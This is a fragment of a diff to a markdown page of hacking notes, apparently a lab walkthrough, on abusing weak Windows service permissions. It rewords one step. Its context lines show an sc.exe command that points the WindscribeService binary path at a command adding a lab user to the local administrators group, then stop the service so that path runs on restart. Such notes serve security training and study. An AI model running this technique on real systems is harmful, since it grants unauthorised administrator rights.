amandaguglieri/hackinglife/docs/windows-abusing-weak-permissions.md

 sc.exe config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
 ```

-### Restarting the Service

-Next, we must stop the service, so the new binpath command will run the next time it is started.
+Now we need to restart the service, so the new binpath command will run the next time it is started.

 ```powershell
 sc.exe stop WindscribeService